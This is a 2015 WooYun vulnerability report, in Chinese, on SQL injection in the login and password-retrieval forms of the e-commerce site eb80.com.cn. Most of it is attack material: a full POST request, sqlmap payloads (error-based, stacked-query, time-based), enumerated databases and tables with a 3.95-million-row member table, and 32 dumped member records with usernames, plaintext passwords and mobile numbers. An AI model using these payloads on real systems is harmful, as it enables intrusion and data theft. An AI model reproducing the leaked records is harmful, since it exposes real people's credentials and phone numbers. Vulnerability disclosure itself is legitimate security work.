当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0150404

漏洞标题:中国商业港多处sql注入可导致395万会员信息泄漏(影响大量企业)

相关厂商:中国商业港

漏洞作者: 撸撸侠

提交时间:2015-10-29 17:15

修复时间:2015-12-13 17:16

公开时间:2015-12-13 17:16

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-10-29: 积极联系厂商并且等待厂商认领中,细节不对外公开
2015-12-13: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

中国商业港多处sql注入可导致395万会员信息泄漏(影响大量企业)

详细说明:

http://www.eb80.com.cn/retrieve.aspx
http://www.eb80.com.cn/login.aspx
登陆用户名和密码都存在注入

POST /retrieve.aspx HTTP/1.1
Host: www.eb80.com.cn
Proxy-Connection: keep-alive
Content-Length: 258
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: http://www.eb80.com.cn
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.85 Safari/537.36
Content-Type: application/x-www-form-urlencoded
DNT: 1
Referer: http://www.eb80.com.cn/retrieve.aspx
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,en;q=0.6
Cookie: baidu=url=https://www.baidu.com/link?url=NruWSHx6qapsBW8OUE-sd385TXJT2ftf0ip_wap6ZbxFI46wwh3BTaysIRg92oMT&wd=&eqid=e3597bae0000a299000000045631d950; CNZZDATA2189235=cnzz_eid%3D402168800-1445938092-null%26ntime%3D1446103279
AlexaToolbar-ALX_NS_PH: AlexaToolbar/alxg-3.3
__VIEWSTATE=%2FwEPDwUKMTQxMjk1Mzk2OGRkCQOt689wrulJvSfJR%2Bagkr%2FW03QmpbLnupc2%2BgHxUmc%3D&__EVENTVALIDATION=%2FwEWAwLXw6yLDQKpkq%2B%2BBQKM54rGBs%2BmqWbjv05jIBDG%2BHeMrqu%2FhnDpkRz%2BNN2Twh8l5flh&loginid=1234%40qq.com*&Button1=%C8%A1%BB%D8%C3%DC%C2%EB


参数loginid存在sql注入

漏洞证明:

Parameter: #1* ((custom) POST)
    Type: error-based
    Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
    Payload: __VIEWSTATE=/wEPDwUKMTQxMjk1Mzk2OGRkCQOt689wrulJvSfJR+agkr/W03QmpbLnupc2+gHxUmc=&__EVENTVALIDATION=/wEWAwLXw6yLDQKpkq++BQKM54rGBs+mqWbjv05jIBDG+HeMrqu/hnDpkRz+NN2Twh8l5flh&[email protected]' AND 4942=CONVERT(INT,(SELECT CHAR(113)+CHAR(120)+CHAR(98)+CHAR(107)+CHAR(113)+(SELECT (CASE WHEN (4942=4942) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(122)+CHAR(122)+CHAR(106)+CHAR(113))) AND 'DnHl'='DnHl&Button1=%C8%A1%BB%D8%C3%DC%C2%EB
    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries (comment)
    Payload: __VIEWSTATE=/wEPDwUKMTQxMjk1Mzk2OGRkCQOt689wrulJvSfJR+agkr/W03QmpbLnupc2+gHxUmc=&__EVENTVALIDATION=/wEWAwLXw6yLDQKpkq++BQKM54rGBs+mqWbjv05jIBDG+HeMrqu/hnDpkRz+NN2Twh8l5flh&[email protected]';WAITFOR DELAY '0:0:5'--&Button1=%C8%A1%BB%D8%C3%DC%C2%EB
    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase time-based blind (comment)
    Payload: __VIEWSTATE=/wEPDwUKMTQxMjk1Mzk2OGRkCQOt689wrulJvSfJR+agkr/W03QmpbLnupc2+gHxUmc=&__EVENTVALIDATION=/wEWAwLXw6yLDQKpkq++BQKM54rGBs+mqWbjv05jIBDG+HeMrqu/hnDpkRz+NN2Twh8l5flh&[email protected]' WAITFOR DELAY '0:0:5'--&Button1=%C8%A1%BB%D8%C3%DC%C2%EB
---
[16:56:57] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, ASP.NET 4.0.30319, Microsoft IIS 6.0
back-end DBMS: Microsoft SQL Server 2008
[16:56:57] [INFO] fetching database names
[16:56:57] [INFO] the SQL query used returns 9 entries
[16:56:57] [INFO] resumed: EbBuy
[16:56:57] [INFO] resumed: master
[16:56:57] [INFO] resumed: model
[16:56:57] [INFO] resumed: msdb
[16:56:57] [INFO] resumed: new21tex
[16:56:57] [INFO] resumed: ReportServer
[16:56:57] [INFO] resumed: ReportServerTempDB
[16:56:57] [INFO] resumed: tempdb
[16:56:57] [INFO] resumed: zlceshi
available databases [9]:
[*] EbBuy
[*] master
[*] model
[*] msdb
[*] new21tex
[*] ReportServer
[*] ReportServerTempDB
[*] tempdb
[*] zlceshi


Database: new21tex
[46 tables]
+--------------+
| BuyOne       |
| Cert         |
| GoldenChange |
| KeyList      |
| MoneyList    |
| News         |
| Pro_cate     |
| Report       |
| SeeBuy       |
| UpdateMoney  |
| admin        |
| appraisal    |
| area         |
| bbs          |
| bbscate      |
| bbsreport    |
| buy          |
| buylink      |
| buyold       |
| cate         |
| cateinfo     |
| client       |
| delmember    |
| dtproperties |
| favorite     |
| friend       |
| friendlyLink |
| hangzhou     |
| info         |
| info_cate    |
| info_manage  |
| info_report  |
| job          |
| keywords     |
| link         |
| member       |
| mystore      |
| newcate      |
| pm           |
| poll         |
| question     |
| remark       |
| sale         |
| toupiao      |
| zymjisuande  |
| zymjisuande2 |
+--------------+


Database: new21tex
+------------------+---------+
| Table            | Entries |
+------------------+---------+
| dbo.member       | 3953424 |
| dbo.buylink      | 1130709 |
| dbo.buyold       | 774857  |
| dbo.buy          | 375335  |
| dbo.BuyOne       | 212201  |
| dbo.Pro_cate     | 138593  |
| dbo.cateinfo     | 60941   |
| dbo.sale         | 40717   |


列举几条数据证明:

Database: new21tex
Table: member
[32 entries]
+----------------+-----------------+-------------+-------------------+
| loginid        | password        | mobile      | email             |
+----------------+-----------------+-------------+-------------------+
| hdsm           | 232518          | 15888578621 | [email protected]      |
| chunhu888      | 82750082        | 13735051668 | [email protected]  |
| my0397         | 3935555         | 13033788602 | [email protected]      |
| kamada0421     | kamada123456    | 13929413635 | [email protected]       |
| wei10021230    | 123123          | 18639195144 | [email protected]  |
| futianjian     | a5682563        | 18473056208 | [email protected] |
| sdxx           | sdxx159         | 13388866666 | [email protected] |
| nss607         | nss607nss607    | 13602885625 | [email protected] |
| ykzdhsb        | 553231          | 13994227979 | [email protected] |
| xinglong       | 518520          | 18028118004 | [email protected] |
| fzcs           | wyy197828       | 13806479595 | [email protected] |
| akr123         | akr1234         | 15098944980 | [email protected] |
| dgy2           | 03557180443     | 15383440960 | [email protected] |
| ylgs           | lwogw           | 13533861288 | [email protected] |
| wangruifa1989  | 1989520mix      | 13510005605 | [email protected]    |
| jhfmzziwo      | jianhuavalve    | 18605366676 | [email protected] |
| zzcinline      | zzcinline       | 15300365668 | [email protected] |
| rst761224      | rst761224123    | 15011876851 | [email protected] |
| wxtmm123       | tianmimi123     | 15261560098 | [email protected] |
| bjdpwg         | 19656634jdww    | 13391838980 | [email protected] |
| beiya321       | sybywdblj       | 13940406166 | [email protected] |
| xinsenkuangye  | 15027773012     | 15027773012 | [email protected] |
| sindy0418      | tangyanfei1984  | 13815177971 | [email protected] |
| zzltyl         | zhengzhouletong | 13393719244 | [email protected] |
| shu8615100     | 4502558         | 15337169306 | [email protected] |
| wmf13608847120 | wmf3310057510   | 13759511960 | [email protected] |
| zhengmei123    | HAIYANG520      | 18855183912 | [email protected] |
| a546620        | a546620         | 13929498483 | [email protected] |
| huamei226      | 890226105       | 15690388969 | [email protected] |
| hl87935548     | a168168         | 13829175103 | [email protected] |
| ji1021055299   | jiyuanjin       | 13952089461 | [email protected] |
| cqdudu         | abcabc000       | 18523369997 | [email protected] |
+----------------+-----------------+-------------+-------------------+

修复方案:

版权声明:转载请注明来源 撸撸侠@乌云

漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝

漏洞Rank:15 (WooYun评价)